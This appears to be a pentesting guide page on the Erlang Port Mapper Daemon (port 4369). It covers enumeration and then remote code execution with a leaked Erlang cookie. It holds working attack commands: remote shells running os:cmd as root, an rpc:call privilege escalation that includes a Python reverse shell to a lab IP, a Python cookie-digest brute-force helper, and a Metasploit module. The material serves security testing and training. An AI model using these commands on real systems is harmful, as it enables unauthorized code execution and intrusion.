4369 - Pentesting Erlang Port Mapper Daemon (epmd)

Basic Info

The Erlang Port Mapper Daemon (epmd) coordinates distributed Erlang instances. Its job is to keep track of which node name listens on which port on the local machine; in other words, epmd maps symbolic node names to TCP ports. Because it is a directory rather than the distribution endpoint itself, querying it is unauthenticated and reveals every registered node name and the port on which that node speaks the Erlang distribution protocol.
Default port: 4369

```
PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
```

epmd is started by default on RabbitMQ and CouchDB installations, so finding this port usually indicates an Erlang-based service on the host.

Enumeration

Manual

```bash
# NAMES_REQ: 2-byte big-endian length (0x0001) followed by the tag 'n' (0x6e).
# epmd answers with its own port and one "name <node> at port <port>" line per registered node.
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369

# Via Erlang. Download a package from https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
# or install it from the distribution repositories
apt-get install erlang
erl # once Erlang is installed this opens an Erlang shell
1> net_adm:names('<HOST>'). % returns {ok, [{NodeName, Port}, ...]} for the remote epmd
```

Automatic

```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672
```

Erlang Cookie RCE

Remote Connection

If you can leak the authentication cookie you can execute code on the host: any node that presents the correct cookie during the distribution handshake is trusted by the target node, and the target will run whatever it is asked to (`os:cmd/1`, `rpc:call/4`, ...) as the user that owns the Erlang VM. Usually the cookie is located in ~/.erlang.cookie of the user running the node and is generated by Erlang the first time a distributed node starts. If it has not been modified or set manually it is a random string of 20 uppercase letters [A-Z]. A cookie can also be passed on the command line with `-setcookie`, in which case it is visible in the process list of the host.
```bash
# -cookie: the leaked cookie; -name: the long name of the node started locally;
# -remsh: the target node, in the form name@host (shown as [email protected] on this page)
[email protected] ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh [email protected]
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]

Eshell V8.1 (abort with ^G)

At last, we can start an erlang shell on the remote system.

([email protected])1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
More information in https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/. The author also shares a program to brute-force the cookie: epmd_bf-0.1.tar.bz2.
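What a leaked cookie actually buys you, and what a brute-forcer has to compute, is the challenge/response step of the distribution handshake: the node proves knowledge of the cookie with MD5(cookie ++ challenge-as-decimal-string). The block below is an added example, not code from the page, from the insinuator post or from the epmd_bf tool. The digest formula follows `dist_util:gen_digest/2` in Erlang/OTP and the challenge-reply layout (`'r'`, 4-byte challenge, 16-byte digest, without the 2-byte length prefix) follows the ERTS distribution protocol documentation; the name and flags messages of the handshake are not implemented here. The cookie, challenge values and candidate list are constructed for the test.

```python
import hashlib
import math
import string
import struct

# Default cookie: 20 characters drawn from A-Z (see the paragraph above).
COOKIE_ALPHABET = string.ascii_uppercase
COOKIE_LENGTH = 20


def gen_digest(cookie, challenge):
    """Mirror of dist_util:gen_digest/2: MD5(Cookie ++ integer_to_list(Challenge)).
    The challenge is a 32-bit unsigned integer chosen by the peer."""
    if not 0 <= challenge < 2 ** 32:
        raise ValueError("challenge must fit in 32 bits")
    return hashlib.md5(cookie.encode("ascii") + str(challenge).encode("ascii")).digest()


def build_challenge_reply(cookie, peer_challenge, own_challenge):
    """Challenge reply body: 'r' + our own 4-byte challenge + digest over the peer's challenge."""
    return b"r" + struct.pack(">I", own_challenge) + gen_digest(cookie, peer_challenge)


def build_challenge_ack(cookie, peer_challenge):
    """Challenge ack body sent by the other side: 'a' + digest over our challenge."""
    return b"a" + gen_digest(cookie, peer_challenge)


def parse_challenge_reply(body):
    """Inverse of build_challenge_reply: returns (challenge, digest)."""
    if len(body) != 21 or body[0:1] != b"r":
        raise ValueError("not a challenge reply body")
    return struct.unpack(">I", body[1:5])[0], body[5:21]


def verify_cookie(candidate, challenge, observed_digest):
    """True if the candidate cookie produces the digest seen on the wire for this challenge."""
    return gen_digest(candidate, challenge) == observed_digest


def offline_bruteforce(challenge, observed_digest, candidates):
    """Test cookie guesses against one captured challenge/digest pair without touching the target.
    Returns the matching cookie or None."""
    for candidate in candidates:
        if verify_cookie(candidate, challenge, observed_digest):
            return candidate
    return None


def default_cookie_keyspace():
    """Number of possible auto-generated cookies (26^20, roughly 94 bits)."""
    return len(COOKIE_ALPHABET) ** COOKIE_LENGTH


if __name__ == "__main__":
    # Constructed values: a made-up cookie and challenges, not taken from any real node.
    cookie = "ABCDEFGHIJKLMNOPQRST"
    peer_challenge, own_challenge = 0x12345678, 0xDEADBEEF
    reply = build_challenge_reply(cookie, peer_challenge, own_challenge)
    chal, digest = parse_challenge_reply(reply)
    print("recovered:", offline_bruteforce(peer_challenge, digest, ["WRONGCOOKIE", cookie]))
    print("auto-generated cookie keyspace: 2^%.1f" % math.log2(default_cookie_keyspace()))
```

The keyspace figure is the practical caveat for the brute-forcer: an auto-generated cookie is not guessable online or offline, so brute-forcing only pays off when an administrator set the cookie by hand to something weak (RabbitMQ and CouchDB deployments often do exactly that, in the config files of the service). When the cookie has been captured from a file, the process list or a config, the verify step above is all that is needed to confirm it is the right one before starting a remote shell.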

Local Connection

In this case CouchDB is abused to escalate privileges locally: the CouchDB Erlang node is running with a cookie that a low-privileged local user can read, so a local node started with that cookie can use `rpc:call/4` to execute `os:cmd/1` inside the CouchDB node, and the commands run as the user that owns the CouchDB process:

```bash
# Start a local node with a short name (-sname) and the leaked cookie
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
# rpc:call(Node, Module, Function, Args) runs os:cmd/1 on the CouchDB node (shown as [email protected])
([email protected])1> rpc:call('[email protected]', os, cmd, [whoami]).
"homer\n"
# Same primitive with a Python reverse shell; adjust the listener IP and port
([email protected])4> rpc:call('[email protected]', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```

Example taken from https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution. The Canape machine on HackTheBox can be used to practice this technique.

Metasploit

```bash
# Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
```

Shodan

  • port:4369 "at port"